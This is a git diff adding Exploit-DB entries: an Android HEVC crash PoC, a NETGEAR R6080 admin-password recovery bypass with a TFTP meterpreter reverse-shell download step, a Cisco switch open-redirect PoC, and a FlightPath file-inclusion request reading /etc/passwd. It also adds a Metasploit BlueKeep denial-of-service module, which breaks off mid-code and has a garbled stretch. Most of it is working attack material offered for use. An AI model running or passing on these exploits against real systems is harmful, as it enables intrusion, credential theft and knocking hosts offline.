diff --git a/exploits/android/dos/47119.txt b/exploits/android/dos/47119.txt
new file mode 100644
index 000000000..bdfa5c31f
--- /dev/null
+++ b/exploits/android/dos/47119.txt
@@ -0,0 +1,79 @@
+CVE-2019-2107 - looks scary. Still remember Stagefright and PNG bugs vulns .... With CVE-2019-2107 the decoder/codec runs under mediacodec user and with properly "crafted" video (with tiles enabled - ps_pps->i1_tiles_enabled_flag) you can possibly do RCE. The codec affected is HVEC (a.k.a H.265 and MPEG-H Part 2) #exploit #rce #android #stagefright #cve
+
+
+More infos
+LineageOS (Android):
+
+02-11 20:18:48.238 260 260 D FFmpegExtractor: ffmpeg detected media content as 'video/hevc' with confidence 0.08
+02-11 20:18:48.239 260 260 I FFMPEG : [hevc @ 0xb348f000] Invalid tile widths.
+02-11 20:18:48.239 260 260 I FFMPEG : [hevc @ 0xb348f000] PPS id out of range: 0
+02-11 20:18:48.240 260 260 I FFMPEG : [hevc @ 0xb348f000] Invalid tile widths.
+02-11 20:18:48.240 260 260 I FFMPEG : [hevc @ 0xb348f000] PPS id out of range: 0
+02-11 20:18:48.240 260 260 I FFMPEG : [hevc @ 0xb348f000] Error parsing NAL unit #5.
+02-11 20:18:48.240 260 260 I FFMPEG : [hevc @ 0xb348f000] Invalid tile widths.
+mplayer (laptop)
+
+id: 0
+[hevc @ 0x7f0bf58a7560]Decoding VPS
+[hevc @ 0x7f0bf58a7560]Main profile bitstream
+[hevc @ 0x7f0bf58a7560]Decoding SPS
+[hevc @ 0x7f0bf58a7560]Main profile bitstream
+[hevc @ 0x7f0bf58a7560]Decoding VUI
+[hevc @ 0x7f0bf58a7560]Decoding PPS
+[hevc @ 0x7f0bf58a7560]Invalid tile widths.
+[hevc @ 0x7f0bf58a7560]Decoding SEI
+[hevc @ 0x7f0bf58a7560]Skipped PREFIX SEI 5
+[hevc @ 0x7f0bf58a7560]PPS id out of range: 0
+[hevc @ 0x7f0bf58a7560]Error parsing NAL unit #5.
+Error while decoding frame!
+This stops it when the tile width is bigger than allowed: https://gitlab.freedesktop.org/gstreamer/meson-ports/ffmpeg/blob/ebf648d490448d511b5fe970d76040169e65ef74/libavcodec/hevc_ps.c#L1526
+
+So the check are there.
+
+On stock/google Andoird I think it will use libhevc, not ffmpeg, when using VideoPlayer.
+
+https://www.droidviews.com/enjoy-hevc-h-265-video-playback-on-android/
+
+I have the google codec:
+
+OMX.google.hevc.decoder
+
+I am wondering however why it does not crash ....
+
+Attaching the video (videopoc.mp4) that should trigger this condition:
+
+if (value >= ps_sps->i2_pic_wd_in_ctb - start)
++ {
++ return IHEVCD_INVALID_HEADER;
++ }
+Maybe somebody have more luck.
+
+More infos 2
+Whoooo hooo .... made it :)
+
+Proof of concept is in hevc-crash-poc.mp4, other videos are for non andoird players.
+
+Hvec-"fright" is possible. You can own the mobile by viewing a video with payload. In my example I didn't include real payload.
+
+07-13 21:50:59.000 3351 3351 I /system/bin/tombstoned: received crash request for pid 24089
+07-13 21:50:59.006 24089 24089 F DEBUG : *** *** *** *** *** *** *** *** *** *** *** *** *** *** *** ***
+07-13 21:50:59.006 24089 24089 F DEBUG : Build fingerprint: 'samsung/hero2ltexx/hero2lte:8.0.0/R16NW/G935FXXS4ESC3:user/release-keys'
+07-13 21:50:59.006 24089 24089 F DEBUG : Revision: '9'
+07-13 21:50:59.006 24089 24089 F DEBUG : ABI: 'arm64'
+07-13 21:50:59.006 24089 24089 F DEBUG : pid: 24089, tid: 24089, name: media.extractor >>> mediaextractor <<<
+07-13 21:50:59.006 24089 24089 F DEBUG : signal 11 (SIGSEGV), code 1 (SEGV_MAPERR), fault addr 0x7ccb800050
+07-13 21:50:59.009 24089 24089 F DEBUG : x0 00000000ffffff36 x1 0000000000000000 x2 00000000000000f0 x3 0000000000000001
+07-13 21:50:59.009 24089 24089 F DEBUG : x4 0000000000000001 x5 0000007ccb5df1b8 x6 0000007cc927363e x7 0000007cc8e7bd04
+07-13 21:50:59.009 24089 24089 F DEBUG : x8 0000000000004170 x9 0000000000004160 x10 00000000ffffffff x11 0000007ccb7fbef0
+07-13 21:50:59.010 24089 24089 F DEBUG : x12 0000007ccb5d3ce0 x13 000000000000001e x14 0000000000000003 x15 0000000000000001
+07-13 21:50:59.010 24089 24089 F DEBUG : x16 0000007cc99f5f50 x17 0000007ccb88885c x18 0000007ccb566225 x19 0000007ccb562020
+07-13 21:50:59.010 24089 24089 F DEBUG : x20 0000007ccb4f18a0 x21 0000007ccb468c6c x22 0000000000000000 x23 0000000000000006
+07-13 21:50:59.010 24089 24089 F DEBUG : x24 000000000000001e x25 0000000000000094 x26 0000000000004160 x27 0000000000000001
+07-13 21:50:59.010 24089 24089 F DEBUG : x28 0000007ccb55e750 x29 0000007fd6d39d90 x30 0000007cc99c4438
+07-13 21:50:59.010 24089 24089 F DEBUG : sp 0000007fd6d39d20 pc 0000007cc99c44c4 pstate 0000000080000000
+07-13 21:50:59.013 24089 24089 F DEBUG :
+--
+
+
+Proof of Concept:
+https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/47119.zip
\ No newline at end of file
diff --git a/exploits/hardware/webapps/47117.txt b/exploits/hardware/webapps/47117.txt
new file mode 100644
index 000000000..dcb7a8a55
--- /dev/null
+++ b/exploits/hardware/webapps/47117.txt
@@ -0,0 +1,77 @@
+# Exploit Title: NETGEAR WiFi Router R6080 - Security Questions Answers Disclosure
+# Date: 13/07/2019
+# Exploit Author: Wadeek
+# Hardware Version: R6080-100PES
+# Firmware Version: 1.0.0.34 / 1.0.0.40
+# Vendor Homepage: https://www.netgear.com/support/product/R6080.aspx
+# Firmware Link: http://www.downloads.netgear.com/files/GDC/R6080/(R6080-V1.0.0.34.zip or R6080-V1.0.0.40.zip)
+
+== Files Containing Juicy Info ==
+>> http://192.168.1.1/currentsetting.htm
+Firmware=V1.0.0.34WW
+Model=R6080
+>> http://192.168.1.1:56688/rootDesc.xml (Server: Unspecified, UPnP/1.0, Unspecified)
+SSSSSSSNNNNNN
+
+== Security Questions Bypass > Answers Disclosure ==
+>> http://192.168.1.1/401_recovery.htm (SSSSSSSNNNNNN value for input)
+
+htpwd_recovery.cgi?id=XXXXXXXXXXXXXXX (one attempt because /tmp/SessionFile.*.htm)
+(replace)
+dev_serial=SSSSSSSNNNNNN&todo=verify_sn&this_file=401_recovery.htm&next_file=securityquestions.htm&SID=
+(by)
+dev_serial=SSSSSSSNNNNNN&todo=verify_sn&this_file=401_recovery.htm&next_file=PWD_password.htm&SID=
+
+
+
+(repeat recovery process for get admin password)
+
+== Authenticated Telnet Command Execution ==
+>> http://admin:Str0nG-!P4ssW0rD@192.168.1.1/setup.cgi?todo=debug
+:~$ telnet 192.168.1.1
+R6080 login: admin
+Password: Str0nG-!P4ssW0rD
+{
+upload by TFTP # tftp -p -r [LOCAL-FILENAME] [IP] [PORT]
+download by TFTP # tftp -g -r [REMOTE-FILENAME_ELF_32-bit_LSB_executable_MIPS || linux/mipsle/meterpreter/reverse_tcp] [IP] [PORT]
+}
+
+
+
+# Exploit Title: NETGEAR WiFi Router R6080 - Security Questions Answers Disclosure
+# Date: 13/07/2019
+# Exploit Author: Wadeek
+# Hardware Version: R6080-100PES
+# Firmware Version: 1.0.0.34 / 1.0.0.40
+# Vendor Homepage: https://www.netgear.com/support/product/R6080.aspx
+# Firmware Link: http://www.downloads.netgear.com/files/GDC/R6080/(R6080-V1.0.0.34.zip or R6080-V1.0.0.40.zip)
+
+== Files Containing Juicy Info ==
+>> http://192.168.1.1/currentsetting.htm
+Firmware=V1.0.0.34WW
+Model=R6080
+>> http://192.168.1.1:56688/rootDesc.xml (Server: Unspecified, UPnP/1.0, Unspecified)
+SSSSSSSNNNNNN
+
+== Security Questions Bypass > Answers Disclosure ==
+>> http://192.168.1.1/401_recovery.htm (SSSSSSSNNNNNN value for input)
+
+htpwd_recovery.cgi?id=XXXXXXXXXXXXXXX (one attempt because /tmp/SessionFile.*.htm)
+(replace)
+dev_serial=SSSSSSSNNNNNN&todo=verify_sn&this_file=401_recovery.htm&next_file=securityquestions.htm&SID=
+(by)
+dev_serial=SSSSSSSNNNNNN&todo=verify_sn&this_file=401_recovery.htm&next_file=PWD_password.htm&SID=
+
+
+
+(repeat recovery process for get admin password)
+
+== Authenticated Telnet Command Execution ==
+>> http://admin:Str0nG-!P4ssW0rD@192.168.1.1/setup.cgi?todo=debug
+:~$ telnet 192.168.1.1
+R6080 login: admin
+Password: Str0nG-!P4ssW0rD
+{
+upload by TFTP # tftp -p -r [LOCAL-FILENAME] [IP] [PORT]
+download by TFTP # tftp -g -r [REMOTE-FILENAME_ELF_32-bit_LSB_executable_MIPS || linux/mipsle/meterpreter/reverse_tcp] [IP] [PORT]
+}
\ No newline at end of file
diff --git a/exploits/hardware/webapps/47118.txt b/exploits/hardware/webapps/47118.txt
new file mode 100644
index 000000000..365b4611e
--- /dev/null
+++ b/exploits/hardware/webapps/47118.txt
@@ -0,0 +1,121 @@
+# Exploit Title: CISCO Small Business 200, 300, 500 Switches Multiple Vulnerabilities.
+# Shodan query: /config/log_off_page.html
+# Discovered Date: 07/03/2014
+# Reported Date: 08/04/2019
+# Exploit Author: Ramikan
+# Website: http://fact-in-hack.blogspot.com
+# Vendor Homepage:https://www.cisco.com/c/en/us/products/switches/small-business-300-series-managed-switches/index.html
+# Affected Devices: The affected products are all Cisco Small Business 200, 300, and 500 Series Managed Switches with the web management interface enabled,
+# Tested On: Cisco C300 Switch
+# Version: 1.3.7.18
+# CVE : CVE-2019-1943
+# CVSS v3: 4.7 (AV:N/AC:H/PR:N/UI:R/S:C/C:L/I:L/A:N)
+# Category:Hardware, Web Apps
+# Reference : https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20190717-sbss-redirect
+
+*************************************************************************************************************************************
+
+Vulnerability 1: Information Gathering
+
+*************************************************************************************************************************************
+
+Unauthenticated user can find the version number and device type by visiting this link directly.
+
+Affected URL:
+
+/cs703dae2c/device/English/dictionaryLogin.xml
+
+*************************************************************************************************************************************
+
+Vulnerability 2: Open Redirect due to host header.
+
+*************************************************************************************************************************************
+
+Can change to different domain under the host header and redirect the request to fake website and can be used for phishing attack also can be used for domain fronting.
+
+Normal Request
+
+GET / HTTP/1.1
+Host: 10.1.1.120
+Accept-Encoding: gzip, deflate
+Accept: */*
+Accept-Language: en-US,en-GB;q=0.9,en;q=0.8
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3497.100 Safari/537.36
+Connection: close
+Cache-Control: max-age=0
+
+Normal Response
+
+HTTP/1.1 302 Redirect
+Server: GoAhead-Webs
+Date: Fri Mar 07 09:40:22 2014
+Connection: close
+Pragma: no-cache
+Cache-Control: no-cache
+Content-Type: text/html
+Location: https://10.21.151.120/cs703dae2c/
+
+
+ This document has moved to a new location.
+ Please update your documents to reflect the new location.
+
+*************************************************************************************************************************************
+POC
+*************************************************************************************************************************************
+
+Host Header changed to different domain (example google.com).
+
+Request:
+
+GET /cs703dae2c HTTP/1.1
+Host: google.com
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:63.0) Gecko/20100101 Firefox/63.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: en-GB,en;q=0.5
+Accept-Encoding: gzip, deflate
+Connection: close
+Cookie: activeLangId=English; isStackableDevice=false
+Upgrade-Insecure-Requests: 1
+
+
+Response:
+
+HTTP/1.1 302 Redirect
+activeLangId=English; isStackableDevice=falseServer: GoAhead-Webs
+Date: Fri Mar 07 09:45:26 2014
+Connection: close
+Pragma: no-cache
+Cache-Control: no-cache
+Content-Type: text/html
+Location: http://google.com/cs703dae2c/config/log_off_page.htm
+
+
+ This document has moved to a new location.
+ Please update your documents to reflect the new location.
+
+
+
+The redirection is happening to http://google.com/cs703dae2c/config/log_off_page.htm. The attacker need to be in same network and should be able to modify the victims request on the wire in order to trigger this vulnerabilty.
+
+*************************************************************************************************************************************
+Attack Vector:
+*************************************************************************************************************************************
+Can be used for domain fronting.
+
+curl -k --header "Host: attack.host.net" "domainname of the cisco device"
+
+
+*************************************************************************************************************************************
+Vendor Response:
+*************************************************************************************************************************************
+
+Issue 1:
+Due to the limited information given out, we are not considering it a vulnerability as such. Still, it would be better if it was not happening, so, we will treat it as a hardening enhancement.
+
+Issue 2:
+The developers won't be able to provide a fix for this in the short term (90 days), so, we are planning to disclose this issue through an advisory on July 17th 2019.
+
+We have assigned CVE CVE-2019-1943 for this issue.
+
+Reference: https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20190717-sbss-redirect
+*************************************************************************************************************************************
\ No newline at end of file
diff --git a/exploits/php/webapps/47121.txt b/exploits/php/webapps/47121.txt
new file mode 100644
index 000000000..b5c9bdc7a
--- /dev/null
+++ b/exploits/php/webapps/47121.txt
@@ -0,0 +1,33 @@
+# Exploit Title: FlightPath < 4.8.2 & < 5.0-rc2 - Local File Inclusion
+# Date: 07-07-2019
+# Exploit Author: Mohammed Althibyani
+# Vendor Homepage: http://getflightpath.com
+# Software Link: http://getflightpath.com/project/9/releases
+# Version: < 4.8.2 & < 5.0-rc2
+# Tested on: Kali Linux
+# CVE : CVE-2019-13396
+
+
+# Parameters : include_form
+# POST Method:
+
+use the login form to get right form_token [ you can use wrong user/pass ]
+
+This is how to POST looks like:
+
+POST /flightpath/index.php?q=system-handle-form-submit HTTP/1.1
+
+callback=system_login_form&form_token=fb7c9d22c839e3fb5fa93fe383b30c9b&form_type=&form_path=login&form_params=YTowOnt9&form_include=&default_redirect_path=login&default_redirect_query=current_student_id%3D%26advising_student_id%3D¤t_student_id=&user=test&password=test&btn_submit=Login
+
+
+# modfiy the POST request to be:
+
+
+POST /flightpath/index.php?q=system-handle-form-submit HTTP/1.1
+
+callback=system_login_form&form_token=fb7c9d22c839e3fb5fa93fe383b30c9b&form_include=../../../../../../../../../etc/passwd
+
+
+
+
+# Greats To : Ryan Saaty, Mohammed Al-Howsa & Haboob Team.
\ No newline at end of file
diff --git a/exploits/windows/dos/47120.rb b/exploits/windows/dos/47120.rb
new file mode 100755
index 000000000..2bd87cbc3
--- /dev/null
+++ b/exploits/windows/dos/47120.rb
@@ -0,0 +1,1004 @@
+# Exploit Title: Bluekeep Denial of Service (metasploit module)
+# Shodan Dork: port:3389
+# Date: 07/14/2019
+# Exploit Author: RAMELLA Sebastien (https://github.com/mekhalleh/)
+# Vendor Homepage: https://microsoft.com
+# Version: all affected RDP services by cve-2019-0708
+# Tested on: Windows XP (32-bits) / Windows 7 (64-bits)
+# CVE : 2019-0708
+
+# I just modified the initial metasploit module for this vuln to produce a denial of service attack.
+
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Auxiliary
+ Rank = NormalRanking
+
+ include Msf::Auxiliary::Dos
+ include Msf::Auxiliary::Scanner
+ include Msf::Exploit::Remote::Tcp
+
+ def initialize(info = {})
+ super(update_info(info,
+ 'Name' => 'CVE-2019-0708 BlueKeep Microsoft Remote Desktop RCE',
+ 'Description' => %q{
+ This module checks a range of hosts for the CVE-2019-0708 vulnerability
+ by binding the MS_T120 channel outside of its normal slot and sending
+ DoS packets.
+ },
+ 'Author' =>
+ [
+ 'National Cyber Security Centre', # Discovery
+ 'JaGoTu', # Module
+ 'zerosum0x0', # Module
+ 'Tom Sellers', # TLS support and documented packets
+ 'RAMELLA Sebastien' # Denial of service module
+ ],
+ 'References' =>
+ [
+ [ 'CVE', '2019-0708' ],
+ [ 'URL', 'https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-0708' ]
+ ],
+ 'DisclosureDate' => '2019-05-14',
+ 'License' => MSF_LICENSE,
+ 'Notes' =>
+ {
+ 'Stability' => [ CRASH_OS_DOWN ],
+ 'AKA' => ['BlueKeep']
+ }
+ ))
+
+ register_options(
+ [
+ OptAddress.new('RDP_CLIENT_IP', [ true, 'The client IPv4 address to report during connection', '192.168.0.100']),
+ OptString.new('RDP_CLIENT_NAME', [ false, 'The client computer name to report during connection', 'rdesktop']),
+ OptString.new('RDP_DOMAIN', [ false, 'The client domain name to report during connection', '']),
+ OptString.new('RDP_USER', [ false, 'The username to report during connection.']),
+ OptAddressRange.new("RHOSTS", [ true, 'Target address, address range or CIDR identifier']),
+ OptInt.new('RPORT', [true, 'The target TCP port on which the RDP protocol response', 3389])
+ ]
+ )
+ end
+
+ # ------------------------------------------------------------------------- #
+
+ def bin_to_hex(s)
+ return(s.each_byte.map { | b | b.to_s(16).rjust(2, '0') }.join)
+ end
+
+ def bytes_to_bignum(bytesIn, order = "little")
+ bytes = bin_to_hex(bytesIn)
+ if(order == "little")
+ bytes = bytes.scan(/../).reverse.join('')
+ end
+ s = "0x" + bytes
+
+ return(s.to_i(16))
+ end
+
+ ## https://www.ruby-forum.com/t/integer-to-byte-string-speed-improvements/67110
+ def int_to_bytestring(daInt, num_chars = nil)
+ unless(num_chars)
+ bits_needed = Math.log(daInt) / Math.log(2)
+ num_chars = (bits_needed / 8.0).ceil
+ end
+ if(pack_code = { 1 => 'C', 2 => 'S', 4 => 'L' }[ num_chars ])
+ [daInt].pack(pack_code)
+ else
+ a = (0..(num_chars)).map{ | i |
+ (( daInt >> i*8 ) & 0xFF ).chr
+ }.join
+ a[0..-2] # Seems legit lol!
+ end
+ end
+
+ def open_connection()
+ begin
+ connect()
+ sock.setsockopt(::Socket::IPPROTO_TCP, ::Socket::TCP_NODELAY, 1)
+ rescue ::Errno::ETIMEDOUT, Rex::HostUnreachable, Rex::ConnectionTimeout, Rex::ConnectionRefused, ::Timeout::Error, ::EOFError => e
+ vprint_error("Connection error: #{e.message}")
+ return(false)
+ end
+
+ return(true)
+ end
+
+ def rsa_encrypt(bignum, rsexp, rsmod)
+ return((bignum ** rsexp) % rsmod)
+ end
+
+ # ------------------------------------------------------------------------- #
+
+ ## Used to abruptly abort scanner for a given host.
+ class RdpCommunicationError < StandardError
+ end
+
+ ## Define standard RDP constants.
+ class RDPConstants
+ PROTOCOL_RDP = 0
+ end
+
+ DEFAULT_CHANNELS_DEFS =
+ "\x04\x00\x00\x00" + # channelCount: 4
+
+ ## Channels definitions consist of a name (8 bytes) and options flags
+ ## (4 bytes). Names are up to 7 ANSI characters with null termination.
+ "\x72\x64\x70\x73\x6e\x64\x00\x00" + # rdpsnd
+ "\x0f\x00\x00\xc0" +
+ "\x63\x6c\x69\x70\x72\x64\x72\x00" + # cliprdr
+ "\x00\x00\xa0\xc0" +
+ "\x64\x72\x64\x79\x6e\x76\x63" + # drdynvc
+ "\x00\x00\x00\x80\xc0" +
+ "\x4d\x53\x5f\x54\x31\x32\x30" + # MS_T120
+ "\x00\x00\x00\x00\x00"
+
+ ## Builds x.224 Data (DT) TPDU - Section 13.7
+ def rdp_build_data_tpdu(data)
+ tpkt_length = data.length + 7
+
+ "\x03\x00" + # TPKT Header version 03, reserved 0
+ [tpkt_length].pack("S>") + # TPKT length
+ "\x02\xf0" + # X.224 Data TPDU (2 bytes)
+ "\x80" + # X.224 End Of Transmission (0x80)
+ data
+ end
+
+ ## Build the X.224 packet, encrypt with Standard RDP Security as needed.
+ ## Default channel_id = 0x03eb = 1003.
+ def rdp_build_pkt(data, rc4enckey = nil, hmackey = nil, channel_id = "\x03\xeb", client_info = false, rdp_sec = true)
+ flags = 0
+ flags |= 0b1000 if(rdp_sec) # Set SEC_ENCRYPT
+ flags |= 0b1000000 if(client_info) # Set SEC_INFO_PKT
+
+ pdu = ""
+
+ ## TS_SECURITY_HEADER - 2.2.8.1.1.2.1
+ ## Send when the packet is encrypted w/ Standard RDP Security and in all Client Info PDUs.
+ if(client_info || rdp_sec)
+ pdu << [flags].pack("S<") # flags "\x48\x00" = SEC_INFO_PKT | SEC_ENCRYPT
+ pdu << "\x00\x00" # flagsHi
+ end
+
+ if(rdp_sec)
+ ## Encrypt the payload with RDP Standard Encryption.
+ pdu << rdp_hmac(hmackey, data)[0..7]
+ pdu << rdp_rc4_crypt(rc4enckey, data)
+ else
+ pdu << data
+ end
+
+ user_data_len = pdu.length
+ udl_with_flag = 0x8000 | user_data_len
+
+ pkt = "\x64" # sendDataRequest
+ pkt << "\x00\x08" # intiator userId (TODO: for a functional client this isn't static)
+ pkt << channel_id # channelId
+ pkt << "\x70" # dataPriority
+ pkt << [udl_with_flag].pack("S>")
+ pkt << pdu
+
+ return(rdp_build_data_tpdu(pkt))
+ end
+
+ ## https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-rdpbcgr/73d01865-2eae-407f-9b2c-87e31daac471
+ ## Share Control Header - TS_SHARECONTROLHEADER - 2.2.8.1.1.1.1
+ def rdp_build_share_control_header(type, data, channel_id = "\xf1\x03")
+ total_len = data.length + 6
+
+ return(
+ [total_len].pack("S<") + # totalLength - includes all headers
+ [type].pack("S<") + # pduType - flags 16 bit, unsigned
+ channel_id + # PDUSource: 0x03f1 = 1009
+ data
+ )
+ end
+
+ ## https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-rdpbcgr/4b5d4c0d-a657-41e9-9c69-d58632f46d31
+ ## Share Data Header - TS_SHAREDATAHEADER - 2.2.8.1.1.1.2
+ def rdp_build_share_data_header(type, data)
+ uncompressed_len = data.length + 4
+
+ return(
+ "\xea\x03\x01\x00" + # shareId: 66538
+ "\x00" + # pad1
+ "\x01" + # streamID: 1
+ [uncompressed_len].pack("S<") + # uncompressedLength - 16 bit, unsigned int
+ [type].pack("C") + # pduType2 - 8 bit, unsigned int - 2.2.8.1.1.2
+ "\x00" + # compressedType: 0
+ "\x00\x00" + # compressedLength: 0
+ data
+ )
+ end
+
+ ## https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-rdpbcgr/6c074267-1b32-4ceb-9496-2eb941a23e6b
+ ## Virtual Channel PDU 2.2.6.1
+ def rdp_build_virtual_channel_pdu(flags, data)
+ data_len = data.length
+
+ return(
+ [data_len].pack("L<") + # length
+ [flags].pack("L<") + # flags
+ data
+ )
+ end
+
+ def rdp_calculate_rc4_keys(client_random, server_random)
+ ## preMasterSecret = First192Bits(ClientRandom) + First192Bits(ServerRandom).
+ preMasterSecret = client_random[0..23] + server_random[0..23]
+
+ ## PreMasterHash(I) = SaltedHash(preMasterSecret, I)
+ ## MasterSecret = PreMasterHash(0x41) + PreMasterHash(0x4242) + PreMasterHash(0x434343).
+ masterSecret = rdp_salted_hash(preMasterSecret, "A", client_random,server_random) + rdp_salted_hash(preMasterSecret, "BB", client_random, server_random) + rdp_salted_hash(preMasterSecret, "CCC", client_random, server_random)
+
+ ## MasterHash(I) = SaltedHash(MasterSecret, I)
+ ## SessionKeyBlob = MasterHash(0x58) + MasterHash(0x5959) + MasterHash(0x5A5A5A).
+ sessionKeyBlob = rdp_salted_hash(masterSecret, "X", client_random, server_random) + rdp_salted_hash(masterSecret, "YY", client_random, server_random) + rdp_salted_hash(masterSecret, "ZZZ", client_random, server_random)
+
+ ## InitialClientDecryptKey128 = FinalHash(Second128Bits(SessionKeyBlob)).
+ initialClientDecryptKey128 = rdp_final_hash(sessionKeyBlob[16..31], client_random, server_random)
+
+ ## InitialClientEncryptKey128 = FinalHash(Third128Bits(SessionKeyBlob)).
+ initialClientEncryptKey128 = rdp_final_hash(sessionKeyBlob[32..47], client_random, server_random)
+
+ macKey = sessionKeyBlob[0..15]
+
+ return initialClientEncryptKey128, initialClientDecryptKey128, macKey, sessionKeyBlob
+ end
+
+ def rdp_connection_initiation()
+ ## Code to check if RDP is open or not.
+ vprint_status("Verifying RDP protocol...")
+
+ vprint_status("Attempting to connect using RDP security")
+ rdp_send(pdu_negotiation_request(datastore['RDP_USER'], RDPConstants::PROTOCOL_RDP))
+
+ received = sock.get_once(-1, 5)
+
+ ## TODO: fix it.
+ if (received and received.include? "\x00\x12\x34\x00")
+ return(true)
+ end
+
+ return(false)
+ end
+
+ ## FinalHash(K) = MD5(K + ClientRandom + ServerRandom).
+ def rdp_final_hash(k, client_random_bytes, server_random_bytes)
+ md5 = Digest::MD5.new
+
+ md5 << k
+ md5 << client_random_bytes
+ md5 << server_random_bytes
+
+ return([md5.hexdigest].pack("H*"))
+ end
+
+ ## https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-rdpbcgr/7c61b54e-f6cd-4819-a59a-daf200f6bf94
+ ## mac_salt_key = "W\x13\xc58\x7f\xeb\xa9\x10*\x1e\xddV\x96\x8b[d"
+ ## data_content = "\x12\x00\x17\x00\xef\x03\xea\x03\x02\x00\x00\x01\x04\x00$\x00\x00\x00"
+ ## hmac = rdp_hmac(mac_salt_key, data_content) # hexlified: "22d5aeb486994a0c785dc929a2855923".
+ def rdp_hmac(mac_salt_key, data_content)
+ sha1 = Digest::SHA1.new
+ md5 = Digest::MD5.new
+
+ pad1 = "\x36" * 40
+ pad2 = "\x5c" * 48
+
+ sha1 << mac_salt_key
+ sha1 << pad1
+ sha1 << [data_content.length].pack('")[0], 5)
+ raise RdpCommunicationError unless buffer_2 # nil due to a timeout
+
+ vprint_status("Received data: #{bin_to_hex(buffer_1 + buffer_2)}")
+ return(buffer_1 + buffer_2)
+ end
+
+ def rdp_send(data)
+ vprint_status("Send data: #{bin_to_hex(data)}")
+
+ sock.put(data)
+ end
+
+ def rdp_sendrecv(data)
+ rdp_send(data)
+
+ return(rdp_recv())
+ end
+
+ # ------------------------------------------------------------------------- #
+
+ ## https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-rdpbcgr/18a27ef9-6f9a-4501-b000-94b1fe3c2c10
+ ## Client X.224 Connect Request PDU - 2.2.1.1
+ def pdu_negotiation_request(user_name = "", requested_protocols = RDPConstants::PROTOCOL_RDP)
+ ## Blank username is valid, nil is random.
+ user_name = Rex::Text.rand_text_alpha(12) if(user_name.nil?)
+ tpkt_len = user_name.length + 38
+ x224_len = user_name.length + 33
+
+ return(
+ "\x03\x00" + # TPKT Header version 03, reserved 0
+ [tpkt_len].pack("S>") + # TPKT length: 43
+ [x224_len].pack("C") + # X.224 LengthIndicator
+ "\xe0" + # X.224 Type: Connect Request
+ "\x00\x00" + # dst reference
+ "\x00\x00" + # src reference
+ "\x00" + # class and options
+ "\x43\x6f\x6f\x6b\x69\x65\x3a\x20\x6d\x73\x74\x73\x68\x61\x73\x68\x3d" + # cookie - literal 'Cookie: mstshash='
+ user_name + # Identifier "username"
+ "\x0d\x0a" + # cookie terminator
+ "\x01\x00" + # Type: RDP Negotiation Request (0x01)
+ "\x08\x00" + # Length
+ [requested_protocols].pack('L<') # requestedProtocols
+ )
+ end
+
+ # https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-rdpbcgr/db6713ee-1c0e-4064-a3b3-0fac30b4037b
+ def pdu_connect_initial(selected_proto = RDPConstants::PROTOCOL_RDP, host_name = "rdesktop", channels_defs = DEFAULT_CHANNELS_DEFS)
+ ## After negotiating TLS or NLA the connectInitial packet needs to include the
+ ## protocol selection that the server indicated in its negotiation response.
+
+ ## TODO: If this is pulled into an RDP library then the channel list likely
+ ## needs to be build dynamically. For example, MS_T120 likely should only
+ ## ever be sent as part of checks for CVE-2019-0708.
+
+ ## build clientName - 12.2.1.3.2 Client Core Data (TS_UD_CS_CORE)
+ ## 15 characters + null terminator, converted to unicode
+ ## fixed length - 32 characters total
+ name_unicode = Rex::Text.to_unicode(host_name[0..14], type = 'utf-16le')
+ name_unicode += "\x00" * (32 - name_unicode.length)
+
+ pdu = "\x7f\x65" + # T.125 Connect-Initial (BER: Application 101)
+ "\x82\x01\xb2" + # Length (BER: Length)
+ "\x04\x01\x01" + # CallingDomainSelector: 1 (BER: OctetString)
+ "\x04\x01\x01" + # CalledDomainSelector: 1 (BER: OctetString)
+ "\x01\x01\xff" + # UpwaredFlag: True (BER: boolean)
+
+ ## Connect-Initial: Target Parameters
+ "\x30\x19" + # TargetParamenters (BER: SequenceOf)
+ ## *** not sure why the BER encoded Integers below have 2 byte values instead of one ***
+ "\x02\x01\x22\x02\x01\x02\x02\x01\x00\x02\x01\x01\x02\x01\x00\x02\x01\x01\x02\x02\xff\xff\x02\x01\x02" +
+
+ ## Connect-Intial: Minimum Parameters
+ "\x30\x19" + # MinimumParameters (BER: SequencOf)
+ "\x02\x01\x01\x02\x01\x01\x02\x01\x01\x02\x01\x01\x02\x01\x00\x02\x01\x01\x02\x02\x04\x20\x02\x01\x02" +
+
+ ## Connect-Initial: Maximum Parameters
+ "\x30\x1c" + # MaximumParameters (BER: SequencOf)
+ "\x02\x02\xff\xff\x02\x02\xfc\x17\x02\x02\xff\xff\x02\x01\x01\x02\x01\x00\x02\x01\x01\x02\x02\xff\xff\x02\x01\x02" +
+
+ ## Connect-Initial: UserData
+ "\x04\x82\x01\x51" + # UserData, length 337 (BER: OctetString)
+
+ ## T.124 GCC Connection Data (ConnectData) - PER Encoding used
+ "\x00\x05" + # object length
+ "\x00\x14\x7c\x00\x01" + # object: OID 0.0.20.124.0.1 = Generic Conference Control
+ "\x81\x48" + # Length: ??? (Connect PDU)
+ "\x00\x08\x00\x10\x00\x01\xc0\x00" + # T.124 Connect PDU, Conference name 1
+ "\x44\x75\x63\x61" + # h221NonStandard: 'Duca' (client-to-server H.221 key)
+ "\x81\x3a" + # Length: ??? (T.124 UserData section)
+
+ ## Client MCS Section - 2.2.1.3
+ "\x01\xc0" + # clientCoreData (TS_UD_CS_CORE) header - 2.2.1.3.2
+ "\xea\x00" + # Length: 234 (includes header)
+ "\x0a\x00\x08\x00" + # version: 8.1 (RDP 5.0 -> 8.1)
+ "\x80\x07" + # desktopWidth: 1920
+ "\x38\x04" + # desktopHeigth: 1080
